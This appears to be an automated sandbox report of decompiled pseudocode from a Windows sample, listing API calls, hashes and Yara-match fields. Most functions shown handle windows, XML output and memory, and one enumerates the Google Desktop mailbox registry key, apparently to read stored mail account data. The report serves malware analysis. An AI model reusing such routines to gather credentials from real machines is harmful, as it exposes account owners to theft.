					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
					E0040A437(_t41);
					SetCursor( *0x416b98);
					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
				}
				return _t16;
			}








                                                                                0x0040a4c9
                                                                                0x0040a4cb
                                                                                0x0040a4d5
                                                                                0x0040a4f5
                                                                                0x0040a4f7
                                                                                0x0040a504
                                                                                0x0040a518
                                                                                0x0040a522
                                                                                0x0040a52f
                                                                                0x0040a532
                                                                                0x0040a53d
                                                                                0x0040a54f
                                                                                0x00000000
                                                                                0x0040a569
                                                                                0x0040a56b

                                                                                APIs
                                                                                • SendMessageA.USER32 ref: 0040A4F5
                                                                                  • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                                  • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                                • SendMessageA.USER32 ref: 0040A518
                                                                                  • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                                  • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                                  • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                  • Part of subcall function 0040A437: SendMessageA.USER32 ref: 0040A4C0
                                                                                • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                                • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                                • SendMessageA.USER32 ref: 0040A566
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                • String ID:
                                                                                • API String ID: 2210206837-0
                                                                                • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                                • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409867, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409018(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}











                                                                                0x00409881
                                                                                0x00409883
                                                                                0x0040988a
                                                                                0x00409899
                                                                                0x004098a0
                                                                                0x004098ad
                                                                                0x004098b9
                                                                                0x004098bd
                                                                                0x004098c3
                                                                                0x004098d7
                                                                                0x004098f1

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040988A
                                                                                • memset.MSVCRT ref: 004098A0
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                  • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                  • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                • sprintf.MSVCRT ref: 004098D7
                                                                                Strings
                                                                                • <%s>, xrefs: 004098D1
                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                • API String ID: 3202206310-1998499579
                                                                                • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                                • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408572, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}








                                                                                0x00408572
                                                                                0x00408572
                                                                                0x0040857b
                                                                                0x0040857d
                                                                                0x0040857e
                                                                                0x00408583
                                                                                0x00408584
                                                                                0x00408589
                                                                                0x0040858b
                                                                                0x0040858c
                                                                                0x00408591
                                                                                0x00408592
                                                                                0x0040859a
                                                                                0x0040859c
                                                                                0x0040859d
                                                                                0x004085a2
                                                                                0x004085a3
                                                                                0x004085ab
                                                                                0x004085ad
                                                                                0x004085b1
                                                                                0x004085b3
                                                                                0x004085b4
                                                                                0x004085ba
                                                                                0x004085ba
                                                                                0x004085bc
                                                                                0x004085bd
                                                                                0x004085c2
                                                                                0x004085c4
                                                                                0x004085ca
                                                                                0x004085cd
                                                                                0x004085d0
                                                                                0x004085d7

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                                • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004085D8, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                                                0x004085d8
                                                                                0x004085db
                                                                                0x004085e1
                                                                                0x004085e6
                                                                                0x004085eb
                                                                                0x004085ed
                                                                                0x004085f2
                                                                                0x004085f3
                                                                                0x004085f8
                                                                                0x004085f9
                                                                                0x004085fe
                                                                                0x00408600
                                                                                0x00408605
                                                                                0x00408606
                                                                                0x0040860b
                                                                                0x0040860c
                                                                                0x00408611
                                                                                0x00408613
                                                                                0x00408618
                                                                                0x00408619
                                                                                0x0040861e
                                                                                0x0040861f
                                                                                0x00408624
                                                                                0x00408626
                                                                                0x0040862b
                                                                                0x0040862c
                                                                                0x00408631
                                                                                0x00408632
                                                                                0x0040863c
                                                                                0x00408640
                                                                                0x00408646

                                                                                APIs
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                                • free.MSVCRT(00000000), ref: 00408640
                                                                                  • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@$free
                                                                                • String ID:
                                                                                • API String ID: 2241099983-0
                                                                                • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                                • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E81A, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 19%
                                                                                			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040E4A4(__ecx, __ecx, __eflags);
					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E004015AE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}







                                                                                0x0040e81a
                                                                                0x0040e820
                                                                                0x0040e826
                                                                                0x0040e828
                                                                                0x0040e871
                                                                                0x0040e879
                                                                                0x0040e87f
                                                                                0x00000000
                                                                                0x0040e88a
                                                                                0x0040e82d
                                                                                0x00000000
                                                                                0x0040e83c
                                                                                0x0040e841
                                                                                0x0040e853
                                                                                0x0040e861
                                                                                0x00000000
                                                                                0x0040e869

                                                                                APIs
                                                                                  • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                                  • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                  • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                                • GetSysColor.USER32(00000005), ref: 0040E849
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                                • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1869857563-0
                                                                                • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                                • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B105, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AE70(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040ADB3(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A27F(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AD9D(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x413560;
						E00401000(_t93,  &_v520, 0x412404);
						E00401000(_t93,  &_v265, 0x412440);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E00401540(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x413560
						_t54 = E0040143D(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AD38(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040AC8A(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A27F(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A27F(0, _t93, _t104, 0);
								E0040A437(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x412ff4;
								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x412ff4;
								_t54 = E0040143D( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E00408654(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}




















                                                                                0x0040b105
                                                                                0x0040b114
                                                                                0x0040b11a
                                                                                0x0040b11c
                                                                                0x0040b120
                                                                                0x0040b12d
                                                                                0x0040b136
                                                                                0x0040b13e
                                                                                0x0040b13e
                                                                                0x0040b144
                                                                                0x0040b149
                                                                                0x0040b14b
                                                                                0x0040b14b
                                                                                0x0040b150
                                                                                0x0040b155
                                                                                0x0040b157
                                                                                0x0040b157
                                                                                0x0040b15c
                                                                                0x0040b161
                                                                                0x0040b165
                                                                                0x0040b165
                                                                                0x0040b170
                                                                                0x0040b178
                                                                                0x0040b17e
                                                                                0x0040b17e
                                                                                0x0040b189
                                                                                0x0040b18d
                                                                                0x0040b18d
                                                                                0x0040b198
                                                                                0x0040b1a3
                                                                                0x0040b1ab
                                                                                0x0040b1bc
                                                                                0x0040b1c1
                                                                                0x0040b1c5
                                                                                0x0040b1cf
                                                                                0x0040b1d2
                                                                                0x0040b1d3
                                                                                0x0040b1e4
                                                                                0x0040b1ea
                                                                                0x0040b1ee
                                                                                0x0040b1f3
                                                                                0x0040b1f3
                                                                                0x0040b1f5
                                                                                0x0040b1f9
                                                                                0x0040b1fe
                                                                                0x0040b202
                                                                                0x0040b202
                                                                                0x0040b20c
                                                                                0x0040b23d
                                                                                0x0040b23d
                                                                                0x0040b242
                                                                                0x0040b268
                                                                                0x0040b268
                                                                                0x0040b26d
                                                                                0x0040b271
                                                                                0x0040b271
                                                                                0x0040b276
                                                                                0x0040b27b
                                                                                0x0040b27d
                                                                                0x0040b285
                                                                                0x0040b28b
                                                                                0x0040b29d
                                                                                0x0040b29e
                                                                                0x0040b2a3
                                                                                0x0040b2a3
                                                                                0x0040b2a3
                                                                                0x0040b2a5
                                                                                0x0040b2ab
                                                                                0x0040b2b0
                                                                                0x0040b2b0
                                                                                0x0040b2b5
                                                                                0x0040b2bb
                                                                                0x0040b2c3
                                                                                0x0040b2c7
                                                                                0x0040b2c9
                                                                                0x0040b2ce
                                                                                0x0040b2e1
                                                                                0x0040b2e1
                                                                                0x0040b2e7
                                                                                0x0040b2ed
                                                                                0x0040b2f3
                                                                                0x0040b2f3
                                                                                0x0040b2f8
                                                                                0x0040b2fe
                                                                                0x0040b306
                                                                                0x0040b30f
                                                                                0x0040b329
                                                                                0x0040b330
                                                                                0x0040b334
                                                                                0x0040b339
                                                                                0x0040b339
                                                                                0x0040b33d
                                                                                0x0040b343
                                                                                0x0040b34b
                                                                                0x0040b34b
                                                                                0x0040b350
                                                                                0x0040b356
                                                                                0x0040b364
                                                                                0x0040b364
                                                                                0x00000000
                                                                                0x0040b356
                                                                                0x0040b244
                                                                                0x0040b24a
                                                                                0x0040b250
                                                                                0x0040b263
                                                                                0x00000000
                                                                                0x0040b263
                                                                                0x0040b252
                                                                                0x0040b257
                                                                                0x00000000
                                                                                0x0040b20e
                                                                                0x0040b20e
                                                                                0x0040b21a
                                                                                0x0040b238
                                                                                0x00000000
                                                                                0x0040b238
                                                                                0x0040b21c
                                                                                0x0040b221
                                                                                0x0040b226
                                                                                0x0040b226
                                                                                0x0040b228
                                                                                0x00000000
                                                                                0x0040b228
                                                                                0x0040b369
                                                                                0x0040b369
                                                                                0x0040b36f
                                                                                0x0040b36f

                                                                                APIs
                                                                                • DestroyWindow.USER32(?), ref: 0040B13E
                                                                                • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DestroyFocusInvalidateRectWindow
                                                                                • String ID: `5A
                                                                                • API String ID: 3502187192-343712130
                                                                                • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                                • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405CEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E0040173B(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
					E0040169B(_t58, _v8, 1, 1, 1, 0);
					E0040169B(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E004015AE(_t66, _a4, _a8, _a12);
			}










                                                                                0x00405cf1
                                                                                0x00405cf2
                                                                                0x00405cf9
                                                                                0x00405cfb
                                                                                0x00405cfe
                                                                                0x00405df3
                                                                                0x00405e0c
                                                                                0x00405e11
                                                                                0x00405e11
                                                                                0x00405df5
                                                                                0x00405df5
                                                                                0x00405df8
                                                                                0x00405dff
                                                                                0x00405dff
                                                                                0x00405d04
                                                                                0x00405d07
                                                                                0x00405d0f
                                                                                0x00405d1d
                                                                                0x00405d23
                                                                                0x00405d35
                                                                                0x00405d47
                                                                                0x00405d59
                                                                                0x00405d6b
                                                                                0x00405d7d
                                                                                0x00405d8f
                                                                                0x00405da1
                                                                                0x00405db3
                                                                                0x00405dc1
                                                                                0x00405dd0
                                                                                0x00405dd8
                                                                                0x00405de3
                                                                                0x00405de9
                                                                                0x00405dec
                                                                                0x00405e29

                                                                                APIs
                                                                                • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                                  • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                                  • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                                  • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                                • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                • String ID: $
                                                                                • API String ID: 2498372239-3993045852
                                                                                • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                                                • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040719C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040719C(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040EC05(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E0040706C(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040EC05(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















                                                                                0x0040719c
